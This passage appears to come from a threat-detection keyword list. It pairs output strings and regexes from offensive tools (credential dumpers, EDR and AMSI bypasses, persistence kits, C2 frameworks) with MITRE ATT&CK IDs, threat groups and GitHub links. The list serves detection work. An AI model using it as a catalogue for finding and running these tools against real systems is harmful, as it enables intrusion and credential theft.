\u68c0\u6d4b\u5230Stageless payload*",".{0,1000}\[\+\]\s\\u68c0\\u6d4b\\u5230Stageless\spayload.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","#content","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","13043" "*[+] Added {altsecid} to {target}*",".{0,1000}\[\+\]\sAdded\s\{altsecid\}\sto\s\{target\}.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","#content","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","13044" "*[+] Adding your DLL to the LSA Security Packages registry key*",".{0,1000}\[\+\]\sAdding\syour\sDLL\sto\sthe\sLSA\sSecurity\sPackages\sregistry\skey.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","#content","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","13045" "*[+] AMSI Bypassed!*",".{0,1000}\[\+\]\sAMSI\sBypassed!.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral 
Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","#content","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","13046" "*[+] APT persistence establis*",".{0,1000}\[\+\]\sAPT\spersistence\sestablis.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13047" "*[+] Arbitrary Directory Creation to SYSTEM Shell technique !*",".{0,1000}\[\+\]\sArbitrary\sDirectory\sCreation\sto\sSYSTEM\sShell\stechnique\s!.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","#content","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","13048" "*[+] Ask4Creds Loaded*",".{0,1000}\[\+\]\sAsk4Creds\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13049" "*[+] AS-REQ w/o preauth 
successful!*",".{0,1000}\[\+\]\sAS\-REQ\sw\/o\spreauth\ssuccessful!.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","#content","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","13050" "*[+] At job persistence establish*",".{0,1000}\[\+\]\sAt\sjob\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13051" "*[+] Attack aborted. Exiting*",".{0,1000}\[\+\]\sAttack\saborted\.\sExiting.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","#content","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","13052" "*[+] Attempting DCOM NTLM relaying with CLSID*",".{0,1000}\[\+\]\sAttempting\sDCOM\sNTLM\srelaying\swith\sCLSID.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","#content","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","13053" "*[+] Attempting NP impersonation using method EfsRpc to launch 
*",".{0,1000}\[\+\]\sAttempting\sNP\simpersonation\susing\smethod\sEfsRpc\sto\slaunch\s.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","#content","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","13054" "*[+] Attempting NP impersonation using method PrintSpoofer to launch *",".{0,1000}\[\+\]\sAttempting\sNP\simpersonation\susing\smethod\sPrintSpoofer\sto\slaunch\s.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","#content","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","13055" "*[+] Attempting SSRF*",".{0,1000}\[\+\]\sAttempting\sSSRF.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hausec/ProxyLogon","1","0","#content","N/A","10","3","293","76","2024-07-02T10:00:00Z","2021-03-15T14:37:57Z","13056" "*[+] Attempting to call the target EXE from the mock directory*",".{0,1000}\[\+\]\sAttempting\sto\scall\sthe\starget\sEXE\sfrom\sthe\smock\sdirectory.{0,1000}","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. 
A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","#content","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","13057" "*[+] auditd patched successfully*",".{0,1000}\[\+\]\sauditd\spatched\ssuccessfully.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","0","#content","N/A","8","1","21","7","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z","13058" "*[+] Authorized_keys persistence establish*",".{0,1000}\[\+\]\sAuthorized_keys\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13059" "*[+] Auto-generating Pyramid config for modules and agents*",".{0,1000}\[\+\]\sAuto\-generating\sPyramid\sconfig\sfor\smodules\sand\sagents.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#content","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","13060" "*[+] Back to C&C Console*",".{0,1000}\[\+\]\sBack\sto\sC\&C\sConsole.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse 
shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","#content","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","13061" "*[+] Backdoor user persistence establish*",".{0,1000}\[\+\]\sBackdoor\suser\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13062" "*[+] Backdoor user persistence established!*",".{0,1000}\[\+\]\sBackdoor\suser\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13063" "*[+] Backdoored existing 7zip with specified input file*",".{0,1000}\[\+\]\sBackdoored\sexisting\s7zip\swith\sspecified\sinput\sfile.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","#content","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","13064" "*[+] Backdoored existing ISO 
*",".{0,1000}\[\+\]\sBackdoored\sexisting\sISO\s.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","#content","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","13065" "*[+] Backdoored existing MSI *",".{0,1000}\[\+\]\sBackdoored\sexisting\sMSI\s.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","#content","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","13066" "*[+] Backdoored existing VHD *",".{0,1000}\[\+\]\sBackdoored\sexisting\sVHD\s.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","#content","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","13067" "*[+] Bind shell persistence establish*",".{0,1000}\[\+\]\sBind\sshell\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content 
#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13068" "*[+] Bof replay:*",".{0,1000}\[\+\]\sBof\sreplay\:.{0,1000}","offensive_tool_keyword","Nightmangle","Nightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","#content","N/A","10","10","156","19","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z","13069" "*[+] Build pupysh environment *",".{0,1000}\[\+\]\sBuild\spupysh\senvironment\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#content","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","13070" "*[+] Building GTFOBins lists*",".{0,1000}\[\+\]\sBuilding\sGTFOBins\slists.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","#content","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","13071" "*[+] Building linux exploit 
suggesters*",".{0,1000}\[\+\]\sBuilding\slinux\sexploit\ssuggesters.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","#content #linux","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","13072" "*[+] Building S4U2proxy request for service: *",".{0,1000}\[\+\]\sBuilding\sS4U2proxy\srequest\sfor\sservice\:\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13073" "*[+] Building S4U2self *",".{0,1000}\[\+\]\sBuilding\sS4U2self\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13074" "*[+] Callback forwarded to Brute Ratel Server*",".{0,1000}\[\+\]\sCallback\sforwarded\sto\sBrute\sRatel\sServer.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 
- T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","13075" "*[+] Capabilities backdoor persistence establish*",".{0,1000}\[\+\]\sCapabilities\sbackdoor\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13076" "*[+] Captured snapshot of LSASS process*",".{0,1000}\[\+\]\sCaptured\ssnapshot\sof\sLSASS\sprocess.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","#content","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","13077" "*[+] Clearing msDS-KeyCredentialLink before adding our new KeyCredential*",".{0,1000}\[\+\]\sClearing\smsDS\-KeyCredentialLink\sbefore\sadding\sour\snew\sKeyCredential.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#content","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","13078" "*[+] COFF Loader mode is selected!*",".{0,1000}\[\+\]\sCOFF\sLoader\smode\sis\sselected!.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit 
Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","#content","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","13079" "*[+] COM Hijacked!*",".{0,1000}\[\+\]\sCOM\sHijacked!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","#content","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","13080" "*[+] Connected to \\\\*\\IPC$*",".{0,1000}\[\+\]\sConnected\sto\s\\\\\\\\.{0,1000}\\\\IPC\$.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","0","#content","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","13081" "*[+] Connnecting to all computers and try to get dpapi blobs and master key files*",".{0,1000}\[\+\]\sConnnecting\sto\sall\scomputers\sand\stry\sto\sget\sdpapi\sblobs\sand\smaster\skey\sfiles.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. 
Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","#content","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","13082" "*[+] Copying a Shellcode To Target Memory*",".{0,1000}\[\+\]\sCopying\sa\sShellcode\sTo\sTarget\sMemory.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","#content","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","13083" "*[+] Could not find TeamFiltration config*",".{0,1000}\[\+\]\sCould\snot\sfind\sTeamFiltration\sconfig.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#content","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","13084" "*[+] Create evil class for file transfer*",".{0,1000}\[\+\]\sCreate\sevil\sclass\sfor\sfile\stransfer.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral 
Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","#content","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","13085" "*[+] Created a remote GAC file stream*",".{0,1000}\[\+\]\sCreated\sa\sremote\sGAC\sfile\sstream.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","#content","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","13086" "*[+] Created Elevated HKLM:*",".{0,1000}\[\+\]\sCreated\sElevated\sHKLM\:.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","#content","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","13087" "*[+] Created malicious pre-commit hook in *",".{0,1000}\[\+\]\sCreated\smalicious\spre\-commit\shook\sin\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13088" "*[+] Creating HookChain implants*",".{0,1000}\[\+\]\sCreating\sHookChain\simplants.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","#content","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","13089" "*[+] Creating 
HookChain implants*",".{0,1000}\[\+\]\sCreating\sHookChain\simplants.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","#content","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","13090" "*[+] Creating mock directories*",".{0,1000}\[\+\]\sCreating\smock\sdirectories.{0,1000}","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","#content","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","13091" "*[+] Creating Service on Remote Target?*",".{0,1000}\[\+\]\sCreating\sService\son\sRemote\sTarget\?.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13092" "*[+] Cron persistence established*",".{0,1000}\[\+\]\sCron\spersistence\sestablished.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13093" "*[+] cross realm S4U2Self success!*",".{0,1000}\[\+\]\scross\srealm\sS4U2Self\ssuccess!.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","#content","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","13094" "*[+] Cryptomining folder created!*",".{0,1000}\[\+\]\sCryptomining\sfolder\screated!.{0,1000}","offensive_tool_keyword","cryptomining","A Linux Cryptomining malware","T1496","TA0009","N/A","N/A","Cryptomining","https://github.com/tarcisio-marinho/cryptomining","1","0","#linux #content","N/A","7","1","36","15","2023-05-05T02:42:59Z","2018-04-07T03:59:52Z","13095" "*[+] Decrypted SYSTEM vault policy*",".{0,1000}\[\+\]\sDecrypted\sSYSTEM\svault\spolicy.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. 
It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","#content","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","13096" "*[+] Defender Config Dumped to *",".{0,1000}\[\+\]\sDefender\sConfig\sDumped\sto\s.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#content","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13097" "*[+] delete single event log succ*",".{0,1000}\[\+\]\sdelete\ssingle\sevent\slog\ssucc.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","#content","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","13098" "*[+] Deobfuscated dump saved in file decrypted.dmp*",".{0,1000}\[\+\]\sDeobfuscated\sdump\ssaved\sin\sfile\sdecrypted\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping 